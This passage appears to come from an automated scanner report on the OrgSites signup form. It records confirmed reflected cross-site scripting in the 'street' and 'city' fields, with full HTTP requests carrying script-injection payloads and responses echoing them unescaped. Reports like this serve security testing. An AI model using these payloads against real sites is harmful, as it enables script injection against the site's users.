Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST '"--></style></script><script>alert(0x002ABA)</script>
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002ABA)%3c%2fscript%3e&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:55:41 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="\'\"--></style></script><script>netsparker(0x002ABA)</script>"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST '"--></style></script><script>alert(0x002ABC)</script>
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title=3&street=3&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002ABC)%3c%2fscript%3e&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:56:05 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=\'\"--></style></script><script>netsparker(0x002ABC)</script>><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, 